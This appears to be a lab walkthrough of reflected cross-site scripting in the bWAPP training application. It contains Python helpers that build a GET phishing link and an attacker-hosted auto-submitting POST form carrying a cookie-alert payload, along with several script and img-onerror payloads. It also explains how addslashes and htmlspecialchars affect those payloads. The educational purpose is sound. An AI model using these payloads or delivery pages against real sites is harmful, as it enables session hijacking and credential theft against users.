XSS via GET parameter [Reflected XSS]

Reflected Cross-Site Scripting (XSS) is commonly found where user input is passed via GET parameters and echoed back in the response without proper output encoding. To exploit it, an attacker crafts a URL containing the payload and tricks a user into opening it; because the link points at a domain the user already trusts, they are more likely to click. The server echoes the payload into the response, the victim's browser executes it in the origin of the vulnerable site, and the attacker can hijack the session, steal credentials, or perform other actions as the victim. A quick check while testing: view the page source and compare what you submitted with what came back. If the characters < > " ' & appear unchanged, the input is reaching an HTML context unencoded.

POST parameters can also lead to reflected XSS, but exploitation is less convenient. With GET, the whole attack fits in a link. With POST, the attacker has to host a page that contains a form targeting the vulnerable endpoint and auto-submits it with JavaScript, then lure the victim to that page. The request still reaches the target with the victim's cookies, so the impact is the same, but the link now points at an attacker-controlled site rather than the trusted domain, which makes the phishing step harder. That extra step and lower success rate are why POST-based reflected XSS is seen less often than GET-based attacks.
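To make the two delivery methods concrete, here is an added example (written for this post, not code from bWAPP) that builds a GET phishing link and the equivalent attacker-hosted auto-submitting POST form for the same payload. The target URLs, the parameter names firstname / lastname / form and the payload string are assumptions modelled on bWAPP's reflected XSS pages; adjust them to your lab. Note the encoding difference: the GET payload is URL-encoded into the query string, while the POST payload sits inside a value="" attribute on the attacker's own page and therefore has to be HTML-entity-encoded there so the browser decodes it before submitting it raw to the target.

```python
"""Delivery helpers for a reflected XSS payload: GET link vs. POST auto-submit form.

Added example for this walkthrough, not part of bWAPP. Target URLs and
parameter names are assumptions modelled on bWAPP's xss_get.php / xss_post.php.
"""
import html
from urllib.parse import urlencode

# Assumed lab targets; change the host to match your bWAPP instance.
GET_TARGET = "http://bwapp.local/bWAPP/xss_get.php"
POST_TARGET = "http://bwapp.local/bWAPP/xss_post.php"
PAYLOAD = "<script>alert(document.cookie)</script>"  # constructed test payload


def get_link(first: str, last: str, target: str = GET_TARGET) -> str:
    """GET delivery: the payload is URL-encoded into the query string so the
    resulting link survives copy/paste, mail clients and the browser."""
    query = urlencode({"firstname": first, "lastname": last, "form": "submit"})
    return f"{target}?{query}"


def post_autosubmit_page(first: str, last: str, target: str = POST_TARGET) -> str:
    """POST delivery: an attacker-hosted page with a hidden form that submits
    itself. The payload goes into a value="" attribute on *our* page, so it
    must be entity-encoded here; the browser decodes it before sending, and
    the vulnerable application receives the raw payload."""
    fields = {"firstname": first, "lastname": last, "form": "submit"}
    inputs = "\n".join(
        f'    <input type="hidden" name="{html.escape(k, quote=True)}" '
        f'value="{html.escape(v, quote=True)}">'
        for k, v in fields.items()
    )
    return (
        "<html><body>\n"
        f'  <form id="f" method="post" action="{html.escape(target, quote=True)}">\n'
        f"{inputs}\n"
        "  </form>\n"
        '  <script>document.getElementById("f").submit();</script>\n'
        "</body></html>"
    )


if __name__ == "__main__":
    print(get_link(PAYLOAD, "x"))
    print(post_autosubmit_page(PAYLOAD, "x"))
```

If the entity encoding in post_autosubmit_page() is skipped, the payload closes the value attribute on the attacker's own page and the form submits garbage; that is the most common mistake when building the POST variant by hand.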

I will be using bWAPP for learning purposes.

XSS Reflected GET [Low]:

I will add my first name and last name and submit it.

I can see that the value is passed using GET and is also reflected in the HTML page after submitting.

After looking at the source code, I can see that the first name and last name are added to the HTML inside double quotes.

When I entered "HI" and "hello" in the first name and last name fields wrapped in an H1 HTML tag, I found that the website processes the H1 as an HTML tag and displays the values accordingly.

This means we can most likely also run JavaScript, so let's test for XSS.

As it is rendering HTML tags, I used an img tag to test, and it worked.

XSS Reflected GET [Medium]:

When I passed "HI" and "hello" wrapped in an HTML tag, it was again processed by the web browser.

Again we can try the XSS payloads.

In this instance, the <script> tag executes successfully while the <img> tag with an onerror attribute does not. It is tempting to conclude that the application is stripping dangerous attributes such as onerror, but the observation is also consistent with a filter that escapes quote characters while leaving tags intact: a handler like onerror=alert("xss") then becomes alert(\"xss\"), which is a JavaScript syntax error, whereas <script>alert(1)</script> contains no quotes and survives untouched. bWAPP's medium level does exactly this by passing the input through PHP's addslashes(), a database-escaping function that never touches < > or =. The quick way to tell the two apart is to resubmit the img payload with no quotes (onerror=alert(1)): if it fires, the filter acts on quotes, not on the attribute. Either way this is a partial defense that happens to break one payload, not a fix; only encoding the output for the HTML context closes the hole.

XSS Reflected GET [High]:

Looks like proper security is implemented at this level: the script tag shows up on the page as literal text instead of executing. If you view the source, the angle brackets come back as HTML entities (&lt;script&gt;), which is what bWAPP's high level produces by running the input through htmlspecialchars() with ENT_QUOTES. Because the browser decodes entities for display but never parses them as markup, no tag or event handler can be injected into this context.
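The three levels above (Low, Medium and High) differ only in one output-handling function, so they can be compared side by side offline. The following is an added example written for this post, not bWAPP's own code: it re-implements the PHP functions no_check(), addslashes() and htmlspecialchars() in Python, runs three payloads through each, and applies a static "would this still fire" heuristic. The echo template ("Welcome first last") and the exact payload strings are assumptions, since the post does not show what was typed.

```python
"""Model of what each bWAPP security level does to a reflected GET value.

Added example, not bWAPP's own code: no_check(), addslashes() and
htmlspecialchars() are re-implemented in Python so the effect of each level
on a payload can be inspected offline. The echo template and the exact
payloads are assumptions (the post does not show the strings that were typed).
"""
import html

# Constructed payloads standing in for the ones tried in the walkthrough.
PAYLOADS = {
    "script": "<script>alert(1)</script>",
    "img_quoted": '<img src=x onerror=alert("xss")>',
    "img_unquoted": "<img src=x onerror=alert(1)>",
}


def no_check(data: str) -> str:
    """Low level: value echoed unchanged."""
    return data


def addslashes(data: str) -> str:
    """Medium level: port of PHP addslashes(). Backslash-escapes \\ ' " and NUL
    (a database-escaping function). It never touches < > = or /, so tags and
    event-handler attributes reach the browser intact."""
    return (data.replace("\\", "\\\\")
                .replace("'", "\\'")
                .replace('"', '\\"')
                .replace("\x00", "\\0"))


def htmlspecialchars(data: str) -> str:
    """High level: htmlspecialchars($data, ENT_QUOTES). Encodes & < > " ' so the
    browser displays them as text and never parses them as markup.
    (Python writes ' as &#x27; where PHP writes &#039;; same effect.)"""
    return html.escape(data, quote=True)


LEVELS = {"low": no_check, "medium": addslashes, "high": htmlspecialchars}


def reflect(level: str, first: str, last: str) -> str:
    """Assumed echo template: bWAPP greets the user with both submitted names."""
    f = LEVELS[level]
    return f"Welcome {f(first)} {f(last)}"


def likely_executes(reflected: str) -> bool:
    """Static heuristic, not a browser: the payload still fires if a tag opener
    survived as a literal '<' AND no quote inside it was backslash-escaped
    (addslashes turns alert("xss") into alert(\\"xss\\"), a JS syntax error)."""
    tag_survives = "<script" in reflected or "<img" in reflected
    js_intact = '\\"' not in reflected and "\\'" not in reflected
    return tag_survives and js_intact


def matrix() -> dict:
    """Outcome of every payload at every level: (reflected string, fires?)."""
    result = {}
    for level in LEVELS:
        for name, payload in PAYLOADS.items():
            out = reflect(level, payload, "x")
            result[(level, name)] = (out, likely_executes(out))
    return result


if __name__ == "__main__":
    for (level, name), (out, fires) in matrix().items():
        print(f"{level:6} {name:12} fires={fires!s:5} {out}")
```

Running it reproduces the walkthrough: every payload fires at low, only the quote-free payloads fire at medium, and nothing fires at high. The medium row for img_quoted shows the actual reason the img tag failed: the reflected text is <img src=x onerror=alert(\"xss\")>, with the tag and attribute fully intact and only the quotes damaged.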

bWAPP - XSS Reflected (GET) - High Security Level
